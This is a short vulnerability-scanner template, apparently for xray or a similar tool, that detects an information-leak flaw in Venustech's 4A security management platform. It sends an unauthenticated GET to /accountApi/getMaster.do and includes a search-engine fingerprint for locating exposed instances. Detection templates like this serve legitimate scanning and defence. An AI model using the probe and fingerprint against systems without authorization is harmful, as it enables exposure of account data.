id: venusense-aqgkpt-getMaster-infoleak

info:
  name: venusense aqgkpt getMaster.do infoleak
  author: peiqi
  severity: high
  verified: true
  description: |
    启明星辰 4A统一安全管控平台 getMaster.do 信息泄漏漏洞。 
    hunter: web.body="cas/css/ace-part2.min.css"

rules:
  r0:
    request:
      method: GET
      path: /accountApi/getMaster.do
    expression: response.status == 200 && response.body.bcontains(b'state') && response.body.bcontains(b'true')
expression: r0()